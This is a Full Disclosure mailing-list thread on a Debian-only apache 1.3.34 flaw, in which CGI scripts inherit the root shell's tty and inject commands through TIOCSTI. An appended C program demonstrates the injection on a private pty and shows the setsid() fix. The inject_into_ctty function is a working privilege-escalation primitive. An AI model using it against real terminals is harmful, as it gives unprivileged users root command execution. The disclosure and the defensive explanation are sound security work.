Full Disclosure mailing list archives

Re: Local user to root escalation in apache 1.3.34 (Debian only)


From: "Nikolay Kichukov" <hijacker () oldum net>
Date: Mon, 26 Feb 2007 21:15:48 +0200 (EET)

Lool,
how long has this bug been around?

Sounds scary.

-nik

On Mon, February 26, 2007 8:11 pm, Richard Thrippleton wrote:
Version 1.3.34-4 of Apache in the Debian Linux distribution contains a
hole that allows a local user to access a root shell if the webserver has
been restarted manually. This bug does not exist in the upstream apache
distribution, and was patched in specifically by the Debian distribution.
The bug report is located at
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=357561 . At the time of
writing (over a month since the root hole was clarified), there has been
no official acknowledgement. It is believed that most of the developers
are tied up in more urgent work, getting the TI-86 distribution of Debian
building in time for release.

Unlike every other daemon, apache does not abdicate its controlling tty
on startup, and allows it to be inherited by a cgi script (for example, a
local user's CGI executed using suexec). When apache is manually
restarted, the inherited ctty is the stdin of the (presumably root) shell
that invoked the new instance of apache. Any process is permitted to
invoke the TIOCSTI ioctl on the fd corresponding to its ctty, which allows
it to inject characters that appear to come from the terminal master.
Thus, a user-created CGI script can inject and have executed any input
into the shell that spawned apache.

As a Debian user, this concerns me greatly, as any non-privileged user
would be able to install non-free documentation (GFDL) on any system I
run.

Richard


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
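The primitive Richard describes, as an added example that is not part of either post above: a small C program (assumed Linux-only; function names and the pty harness are this example's own, not anything from Debian's apache package) that injects bytes into its own controlling tty with TIOCSTI, reproduces the inherited-ctty situation on a private pty so it can be run without a real terminal, and shows the check a daemon author wants: after setsid() there is no /dev/tty left for a child to inherit.

```c
/* Added example, not code from the original post or from apache.
 * Linux-specific: TIOCSTI, posix_openpt() and friends. */
#define _POSIX_C_SOURCE 200809L
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <termios.h>
#include <unistd.h>

/* Push `s` into the caller's controlling tty input queue, one byte per
 * TIOCSTI, as if typed at that terminal. This is all a CGI that inherited
 * the root shell's tty would need. Returns bytes injected, -1 if there is
 * no ctty, -2 if the kernel refuses (TIOCSTI on a tty that is not the
 * caller's ctty needs CAP_SYS_ADMIN; Linux >= 6.2 can also disable it
 * system-wide with the dev.tty.legacy_tiocsti sysctl). */
int inject_into_ctty(const char *s)
{
    int fd = open("/dev/tty", O_RDWR | O_NOCTTY);
    if (fd < 0)
        return -1;
    int n = 0;
    for (; s[n] != '\0'; n++) {
        char c = s[n];
        if (ioctl(fd, TIOCSTI, &c) < 0) { close(fd); return -2; }
    }
    close(fd);
    return n;
}

/* 1 if the calling process has a controlling terminal, else 0. */
int has_ctty(void)
{
    int fd = open("/dev/tty", O_RDWR | O_NOCTTY);
    if (fd < 0)
        return 0;
    close(fd);
    return 1;
}

/* The fix a daemon wants: fork a child that detaches with setsid() and
 * report whether /dev/tty is still reachable from it (expected 0). */
int ctty_after_setsid(void)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0)
        _exit(setsid() < 0 ? 2 : has_ctty());
    int st;
    if (waitpid(pid, &st, 0) < 0 || !WIFEXITED(st))
        return -1;
    return WEXITSTATUS(st);
}

/* Reproduce the inherited-ctty scenario on a private pty: the child becomes
 * a session leader, opens the slave so it becomes its ctty (as the admin's
 * terminal was for the CGI), injects `payload` via TIOCSTI, then reads the
 * terminal back. Returns 1 if the tty delivered exactly `payload`, 0 on a
 * mismatch, -2 if TIOCSTI was refused, -1 on any setup error. */
int demo_injection(const char *payload)
{
    int master = posix_openpt(O_RDWR | O_NOCTTY);
    if (master < 0 || grantpt(master) < 0 || unlockpt(master) < 0)
        return -1;
    char name[64];
    const char *p = ptsname(master);          /* static buffer: copy before fork */
    if (p == NULL || strlen(p) >= sizeof name)
        return -1;
    strcpy(name, p);

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (setsid() < 0)
            _exit(10);
        int slave = open(name, O_RDWR);       /* no O_NOCTTY: acquire as ctty */
        struct termios t;
        if (slave < 0 || tcgetattr(slave, &t) < 0)
            _exit(10);
        t.c_lflag &= ~(tcflag_t)(ECHO | ICANON | ISIG | IEXTEN); /* raw-ish */
        t.c_iflag &= ~(tcflag_t)(ICRNL | INLCR | IXON);
        t.c_oflag &= ~(tcflag_t)OPOST;
        if (tcsetattr(slave, TCSANOW, &t) < 0)
            _exit(10);
        char buf[256];
        int n = inject_into_ctty(payload);
        if (n < 0 || n > (int)sizeof buf)
            _exit(n == -2 ? 12 : 10);
        int got = 0;
        while (got < n) {                     /* bytes arrive via the ldisc */
            ssize_t r = read(slave, buf + got, (size_t)(n - got));
            if (r <= 0)
                _exit(10);
            got += (int)r;
        }
        _exit(memcmp(buf, payload, (size_t)n) == 0 ? 11 : 13);
    }
    int st;
    int ok = waitpid(pid, &st, 0) >= 0 && WIFEXITED(st);
    close(master);
    if (!ok)
        return -1;
    switch (WEXITSTATUS(st)) {
    case 11: return 1;
    case 12: return -2;
    case 13: return 0;
    default: return -1;
    }
}

int main(void)
{
    printf("ctty reachable after setsid(): %d\n", ctty_after_setsid());
    printf("pty injection of \"id\\n\": %d\n", demo_injection("id\n"));
    return 0;
}
```

Run from an interactive root shell, inject_into_ctty("id\n") on its own would type the command into that shell, which is the whole bug; demo_injection() only ever touches a pty it created, so it is safe to run anywhere. The defensive half is the one-liner every daemon that later execs untrusted code should carry: setsid() (or TIOCNOTTY) before fork/exec, after which has_ctty() returns 0 and the child has nothing to push keystrokes into.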